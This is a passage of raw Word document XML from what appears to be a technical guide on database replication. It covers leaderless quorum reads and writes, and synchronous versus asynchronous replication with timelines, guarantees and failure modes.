    <w:p w14:paraId="21747650" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              R nodes (e.g., 2/3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBA206" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3742D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No designated leader. ANY node can accept writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247CE4CD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Client sends write to W nodes (W = write quorum).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66624903" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Client reads from R nodes (R = read quorum).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397EF4D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1502"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>If W + R &gt; N (total nodes): read quorum overlaps with write quorum → guaranteed to see latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C43670" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quorum configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40693BE2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B14BC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>N = 3 (total replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC73CA6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>W = 2 (write to 2 nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E89AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>R = 2 (read from 2 nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A42508" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>W + R = 4 &gt; 3 → at least 1 node in the read set also received the write → consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642DA1C9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="45A47BDA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Alternative:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230403F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>W = 1, R = 3: Fast writes (only 1 must acknowledge), but reads must check all 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D99DD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>W = 3, R = 1: Slow writes (all must acknowledge), but fast reads (any 1 is sufficient).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4791F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> DynamoDB, Cassandra, Riak, Voldemort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C758D5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A78A31" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No single point of failure (no leader to fail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D5717" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>High availability for writes (any node accepts writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2DD4D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1503"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Tolerates node failures gracefully (quorum still achievable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE0CBE8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FB63B7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Conflicts possible (concurrent writes to different nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D348D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read repair needed (if nodes disagree, must reconcile).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D45F397" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>No total ordering of writes (makes some queries difficult).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9ED720" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1504"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>More complex client logic (must handle quorum, retry, conflict resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAFB66C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="12DF9D2D">
          <v:rect id="_x0000_i5640" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6383C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Synchronous vs. Asynchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D817F5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Synchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BFAC2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F9568" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Client → Primary: INSERT INTO orders VALUES (...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C381B6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary: Write to local WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153EF2B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica 1: Send WAL record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B2C79" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica 2: Send WAL record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B5EE82" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica 1: Apply WAL record → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BAED1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica 2: Apply WAL record → ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE6D9B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary: All replicas confirmed → Commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F9972" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Client: "Success" (write is durable on ALL nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E5E7D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBC477" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCE804" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>T=0ms:  Client sends write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDB2AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=1ms:  Primary writes locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C6CCA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=2ms:  Primary sends to replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65666855" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=3ms:  Replica 1 applies + ACKs (same datacenter, fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD74C0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=52ms: Replica 2 applies + ACKs (cross-region, 50ms RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334A47F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=52ms: Primary confirms to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65975F32" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="7B2BF0CE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write latency: 52ms (bound by slowest replica!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC20166" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC9BEB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1505"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Write is confirmed ONLY after ALL replicas have it. If primary dies immediately after confirming, data is safe on replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6557F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1505"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Any replica can serve reads immediately after write confirmation — it already has the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FABBC8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502CEE9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Write latency = max(all replica acknowledgment times). One slow/distant replica slows ALL writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C87FA8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If ANY replica is down/unreachable, writes CANNOT complete (blocked waiting for ACK that never comes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D64705" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1506"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Limited by the slowest replica's write speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F4F60" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Asynchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44F76E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D523D4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Client → Primary: INSERT INTO orders VALUES (...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC794C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary: Write to local WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F562710" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Client: "Success" (write is durable on PRIMARY only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17254B1C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica 1: Send WAL record (background, non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF30CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary → Replica 2: Send WAL record (background, non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF7107" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>(Replicas apply whenever they get around to it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FE37F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA763B0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A84E00" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=0ms:  Client sends write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5219A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=1ms:  Primary writes locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6F559" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=1ms:  Primary confirms to client ← IMMEDIATE (doesn't wait for replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F4075" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=2ms:  Primary sends to replicas (asynchronously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF89C58" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=3ms:  Replica 1 applies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292E5FD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>T=52ms: Replica 2 applies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DE4DC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="7691D6D6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Write latency: 1ms (just local write!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBC6F4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173C582F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1507"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Writes are as fast as a single-node database (no waiting for replicas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FB8E0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1507"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Writes succeed even if replicas are down (primary doesn't wait).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53342CE2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AACD32" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data loss on failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If primary dies at T=1.5ms (after confirming to client but before replicas receive the write), the write is LOST. The client thinks it succeeded, but no replica has it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8EB61B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication lag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Replicas are always behind the primary (by milliseconds to seconds under normal load, potentially minutes under heavy load).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECF376" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1508"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stale reads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Reading from a replica may return old data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044E4E9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Semi-Synchronous Replication</w:t>
